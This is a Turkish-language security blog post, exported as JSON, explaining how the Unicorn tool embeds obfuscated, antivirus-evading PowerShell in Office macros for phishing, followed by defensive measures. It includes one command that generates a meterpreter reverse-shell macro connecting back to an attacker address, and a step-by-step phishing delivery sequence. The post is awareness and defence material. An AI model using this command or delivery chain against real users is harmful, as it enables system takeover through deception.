[{"id":319,"title":"Unicorn: Sosyal M\u00fchendisli\u011fin \"Sihirli\" Arac\u0131 ve Nas\u0131l Korunursunuz?","content":"<h2>Giri\u015f<\/h2>\r\n<p>Unicorn: Sosyal M&uuml;hendisli\u011fin \"Sihirli\" Arac\u0131 ve Nas\u0131l Korunursunuz?<\/p>\r\n<p>Siber g&uuml;venlik d&uuml;nyas\u0131nda, en g&uuml;&ccedil;l&uuml; g&uuml;venlik duvarlar\u0131n\u0131 ve yaz\u0131l\u0131mlar\u0131 atlatman\u0131n en etkili yollar\u0131ndan biri, insan fakt&ouml;r&uuml;n&uuml; hedef alan sosyal m&uuml;hendislik sald\u0131r\u0131lar\u0131d\u0131r. \u0130\u015fte tam bu noktada, TrustedSec taraf\u0131ndan geli\u015ftirilen Unicorn Framework, adeta bir \"sihirbaz\" gibi, s\u0131radan g&ouml;r&uuml;nen bir epostay\u0131 veya dosyay\u0131 g&uuml;&ccedil;l&uuml; bir sald\u0131r\u0131 arac\u0131na d&ouml;n&uuml;\u015ft&uuml;r&uuml;yor.<\/p>\r\n<p>Peki nedir bu Unicorn, nas\u0131l &ccedil;al\u0131\u015f\u0131r ve en &ouml;nemlisi, onun gibi ara&ccedil;lara kar\u015f\u0131 nas\u0131l korunabiliriz? Gelin birlikte inceleyelim.<\/p>\r\n<h2>Unicorn Nedir?<\/h2>\r\n<p>Unicorn, kullan\u0131m\u0131 son derece basit bir komut sat\u0131r\u0131 arac\u0131d\u0131r. Temel amac\u0131, bir PowerShell beti\u011fini (script) zarars\u0131z g&ouml;r&uuml;nen bir Microsoft Office makrosuna (VBA) d&ouml;n&uuml;\u015ft&uuml;rmektir. Neden mi?<\/p>\r\n<p>&Ccedil;&uuml;nk&uuml; PowerShell, Windows sistemlerdeki \"\u0130svi&ccedil;re &Ccedil;ak\u0131s\u0131\"d\u0131r. A\u011f ke\u015ffi, veri s\u0131zd\u0131rma, dosya indirme ve daha bir&ccedil;ok g&uuml;&ccedil;l&uuml; i\u015flemi ger&ccedil;ekle\u015ftirebilir. Ancak, bir sald\u0131rgan\u0131n hedef sistemde komut sat\u0131r\u0131n\u0131 a&ccedil;\u0131p PowerShell beti\u011fi yazmas\u0131 pek m&uuml;mk&uuml;n de\u011fildir. \u0130\u015fte Unicorn, bu g&uuml;c&uuml;, kullan\u0131c\u0131n\u0131n sadece bir Word veya Excel dosyas\u0131n\u0131 a&ccedil;\u0131p \"Makrolar\u0131 Etkinle\u015ftir\" butonuna t\u0131klamas\u0131yla devreye sokar.<\/p>\r\n<h2>Unicorn Nas\u0131l &Ccedil;al\u0131\u015f\u0131r? (Sihirin Arkas\u0131ndaki Bilim)<\/h2>\r\n<p>S&uuml;re&ccedil; basit ve etkilidir:<\/p>\r\n<p>1. &nbsp;Payload Olu\u015fturma: Sald\u0131rgan, Unicorn'a basit bir komut verir (&ouml;rne\u011fin, hedef sisteme ters kabuk &nbsp;reverse shell &nbsp;ba\u011flant\u0131s\u0131 a&ccedil;mas\u0131n\u0131 s&ouml;yleyen bir komut).<br>2. &nbsp;PowerShell'e D&ouml;n&uuml;\u015f&uuml;m: Unicorn, bu komutu s\u0131k\u0131\u015ft\u0131r\u0131lm\u0131\u015f ve karma\u015f\u0131k bir PowerShell komut dosyas\u0131na d&ouml;n&uuml;\u015ft&uuml;r&uuml;r. Bu kod, antivir&uuml;s yaz\u0131l\u0131mlar\u0131ndan ka&ccedil;\u0131nmak i&ccedil;in &ouml;zel olarak tasarlanm\u0131\u015ft\u0131r.<br>3. &nbsp;VBA Makrosuna Yerle\u015ftirme: Olu\u015fturulan PowerShell kodu, otomatik olarak bir Microsoft Office VBA makrosunun i&ccedil;ine g&ouml;m&uuml;l&uuml;r.<br>4. &nbsp;Hedefe Ula\u015ft\u0131rma: Sald\u0131rgan, bu Office dosyas\u0131n\u0131 (.docm veya .xlsm) bir eposta eki olarak g&ouml;nderir veya indirilmesi i&ccedil;in bir link payla\u015f\u0131r. Eposta genellikle acil, inand\u0131r\u0131c\u0131 ve ki\u015fiye &ouml;zel haz\u0131rlanm\u0131\u015ft\u0131r (oltalaman\u0131n phishing).<br>5. &nbsp;Kurban T\u0131klar: Kurban dosyay\u0131 a&ccedil;ar. Office, g&uuml;venlik nedeniyle makrolar\u0131 varsay\u0131lan olarak devre d\u0131\u015f\u0131 b\u0131rak\u0131r ve bir uyar\u0131 &ccedil;ubu\u011fu g&ouml;sterir. Sald\u0131rgan\u0131n epostas\u0131, kullan\u0131c\u0131y\u0131 \"Belgeyi d&uuml;zg&uuml;n g&ouml;r&uuml;nt&uuml;lemek i&ccedil;in makrolar\u0131 etkinle\u015ftirin\" gibi bir mesajla kand\u0131r\u0131r.<br>6. &nbsp;Sihir Ger&ccedil;ekle\u015fir: Kullan\u0131c\u0131 \"Makrolar\u0131 Etkinle\u015ftir\" butonuna t\u0131klad\u0131\u011f\u0131 anda, g&ouml;m&uuml;l&uuml; VBA kodu &ccedil;al\u0131\u015f\u0131r ve arka planda gizlice PowerShell komut dosyas\u0131n\u0131 y&uuml;r&uuml;t&uuml;r. Art\u0131k sald\u0131rgan, hedef sistemde istedi\u011fi komutu &ccedil;al\u0131\u015ft\u0131rabilir.<\/p>\r\n<h2>Unicorn'u Bu Kadar G&uuml;&ccedil;l&uuml; K\u0131lan Nedir?<\/h2>\r\n<p>&nbsp; &nbsp;Basitlik: Tek bir komutla g&uuml;&ccedil;l&uuml; bir sald\u0131r\u0131 arac\u0131 olu\u015fturulabilir.<br>&nbsp; &nbsp;Antivir&uuml;s Atlatma (Evasion): PowerShell payload'lar\u0131n\u0131 obfuscate (kodu karma\u015f\u0131kla\u015ft\u0131rma) ederek bir&ccedil;ok imza tabanl\u0131 antivir&uuml;s &ccedil;&ouml;z&uuml;m&uuml;n&uuml; atlatabilir.<br>&nbsp; &nbsp;Kullan\u0131c\u0131 Dostu Aray&uuml;z: Unicorn'un unicorn.py beti\u011fi, renkli ve anla\u015f\u0131l\u0131r bir &ccedil;\u0131kt\u0131 sunar, kullan\u0131m\u0131 &ccedil;ok kolayd\u0131r.<br>&nbsp; &nbsp;Esneklik: Metasploit payload'lar\u0131, &ouml;zel PowerShell komutlar\u0131 ve daha fazlas\u0131 i&ccedil;in kullan\u0131labilir.<\/p>\r\n<h2>&Ouml;rnek Bir Kullan\u0131m<\/h2>\r\n<p>Bir sald\u0131rgan\u0131n, hedefe ba\u011flanacak basit bir ters kabuk olu\u015fturmak i&ccedil;in kullanaca\u011f\u0131 komut \u015funa benzer:<\/p>\r\n<p><br><code>python unicorn.py windows\/meterpreter\/reverse_http 192.168.1.100 8080<\/code><\/p>\r\n<p><br>Bu komut &ccedil;al\u0131\u015ft\u0131r\u0131ld\u0131\u011f\u0131nda Unicorn, gerekli PowerShell kodunu ve i&ccedil;ine bu kodu g&ouml;m&uuml;l&uuml; oldu\u011fu payload.txt (VBA kodu) dosyas\u0131n\u0131 olu\u015fturur. Sald\u0131rgan bu VBA kodunu bir Word makrosuna kopyalay\u0131p dosyay\u0131 kaydeder ve hedefe g&ouml;nderir.<\/p>\r\n<h2>&nbsp;Unicorn'a Kar\u015f\u0131 Nas\u0131l Korunuruz?<\/h2>\r\n<p>Unicorn'un g&uuml;c&uuml;, insan hatas\u0131na dayan\u0131r. Bu nedenle korunma y&ouml;ntemleri de teknik ve insan odakl\u0131 &ouml;nlemlerin bir birle\u015fimidir:<\/p>\r\n<p>1. &nbsp;Kullan\u0131c\u0131 E\u011fitimi (En Kritik &Ouml;nlem): &Ccedil;al\u0131\u015fanlar\u0131n\u0131z\u0131 sosyal m&uuml;hendislik ve oltalama sald\u0131r\u0131lar\u0131 konusunda s&uuml;rekli e\u011fitin. Tan\u0131mad\u0131klar\u0131 ki\u015filerden gelen, beklenmedik epostalar\u0131 ve ekleri asla a&ccedil;mamalar\u0131 gerekti\u011fini &ouml;\u011fretin. \"Makrolar\u0131 Etkinle\u015ftir\" uyar\u0131s\u0131n\u0131 g&ouml;rd&uuml;klerinde \u015f&uuml;phelenmeliler!<br>2. &nbsp;Makrolar\u0131 Devre D\u0131\u015f\u0131 B\u0131rak\u0131n: Kurumsal ortamlarda, G&uuml;venlik \u0130lkeleri (Group Policy) arac\u0131l\u0131\u011f\u0131yla t&uuml;m Microsoft Office uygulamalar\u0131nda makrolar\u0131 genel olarak devre d\u0131\u015f\u0131 b\u0131rak\u0131n. E\u011fer mutlaka gerekliyse, yaln\u0131zca imzalanm\u0131\u015f makrolara veya belirli g&uuml;venilen konumlardaki dosyalara izin verin.<br>3. &nbsp;AppLocker veya WDAC Kullan\u0131n: Windows ortamlar\u0131nda AppLocker veya Daha G&uuml;&ccedil;l&uuml; Windows Defender Uygulama Denetimi (WDAC) kullanarak, yaln\u0131zca yetkili yaz\u0131l\u0131mlar\u0131n ve betiklerin &ccedil;al\u0131\u015ft\u0131r\u0131lmas\u0131na izin verin. Bu, izinsiz bir PowerShell beti\u011finin &ccedil;al\u0131\u015fmas\u0131n\u0131 engelleyebilir.<br>4. &nbsp;PowerShell \u0130\u015flemlerini \u0130zleyin: Geli\u015fmi\u015f g&uuml;venlik &ccedil;&ouml;z&uuml;mleri (EDR &nbsp;Endpoint Detection and Response) kullanarak \u015f&uuml;pheli PowerShell komutlar\u0131n\u0131 (&ouml;rne\u011fin s\u0131k\u0131\u015ft\u0131r\u0131lm\u0131\u015f kod &ccedil;al\u0131\u015ft\u0131ran, gizli pencerede a&ccedil;\u0131lan) izleyin ve alarm &uuml;retin.<br>5. &nbsp;G&uuml;ncel Yaz\u0131l\u0131m ve Antivir&uuml;s: \u0130\u015fletim sistemi ve antivir&uuml;s yaz\u0131l\u0131mlar\u0131n\u0131z\u0131 her zaman g&uuml;ncel tutun. Yeni nesil antivir&uuml;s &ccedil;&ouml;z&uuml;mleri, davran\u0131\u015f analizi ile bu t&uuml;r sald\u0131r\u0131lar\u0131 tespit edebilme yetene\u011fine sahiptir.<\/p>\r\n<h2>&nbsp;Sonu&ccedil;<\/h2>\r\n<p>Unicorn, sosyal m&uuml;hendislik sald\u0131r\u0131lar\u0131n\u0131n ne kadar etkili ve tehlikeli olabilece\u011fini g&ouml;steren m&uuml;kemmel bir ara&ccedil;t\u0131r. Sadece birka&ccedil; sat\u0131r kodla, g&uuml;venlik fark\u0131ndal\u0131\u011f\u0131 d&uuml;\u015f&uuml;k bir kullan\u0131c\u0131 &uuml;zerinden t&uuml;m bir sistemi ele ge&ccedil;irmek m&uuml;mk&uuml;nd&uuml;r.<\/p>\r\n<p>Bu nedenle, g&uuml;venlik duvarlar\u0131n\u0131n ve antivir&uuml;s yaz\u0131l\u0131mlar\u0131n\u0131n &ouml;tesine ge&ccedil;ip, insan\u0131 \"en zay\u0131f halka\" olmaktan &ccedil;\u0131karacak s&uuml;rekli e\u011fitim ve fark\u0131ndal\u0131k &ccedil;al\u0131\u015fmalar\u0131, modern siber g&uuml;venli\u011fin olmazsa olmaz\u0131d\u0131r. Unicorn bize \u015funu hat\u0131rlat\u0131r: En g&uuml;&ccedil;l&uuml; \u015fifre, en pahal\u0131 g&uuml;venlik yaz\u0131l\u0131m\u0131 bile, bir kullan\u0131c\u0131n\u0131n yanl\u0131\u015f bir d&uuml;\u011fmeye t\u0131klamas\u0131 kadar savunmas\u0131z olabilir.<\/p>\r\n<p>&nbsp;<\/p>\r\n<p>Not: Bu yaz\u0131, Unicorn Framework'&uuml;n nas\u0131l &ccedil;al\u0131\u015ft\u0131\u011f\u0131n\u0131 anlamak ve buna kar\u015f\u0131 nas\u0131l korunulaca\u011f\u0131n\u0131 &ouml;\u011fretmek amac\u0131yla yaz\u0131lm\u0131\u015ft\u0131r. Bu bilgiler yaln\u0131zca e\u011fitim ve savunma ama&ccedil;l\u0131 kullan\u0131lmal\u0131d\u0131r. \u0130zinsiz sistemlere s\u0131zma giri\u015fimleri yasa d\u0131\u015f\u0131d\u0131r ve ciddi yasal yapt\u0131r\u0131mlarla sonu&ccedil;lanabilir.<\/p>","excerpt":"Unicorn: Sosyal M\u00fchendisli\u011fin \"Sihirli\" Arac\u0131 ve Nas\u0131l Korunursunuz?","created_at":"2025-10-02 22:15:56","updated_at":"2026-09-08 03:21:19","category_id":7,"view_count":791,"reading_time":6,"status":"published","editor_choice":0,"is_editor_choice":0,"published_at":"2025-10-02 22:15:56","featured_image":"resimyok.jpg","slug":"unicorn-sosyal-muhendisligin-sihirli-araci-ve-nasil-korunursunuz","category_name":"Cyber Security","category_slug":"cyber-security","category_color":"#10b981"}]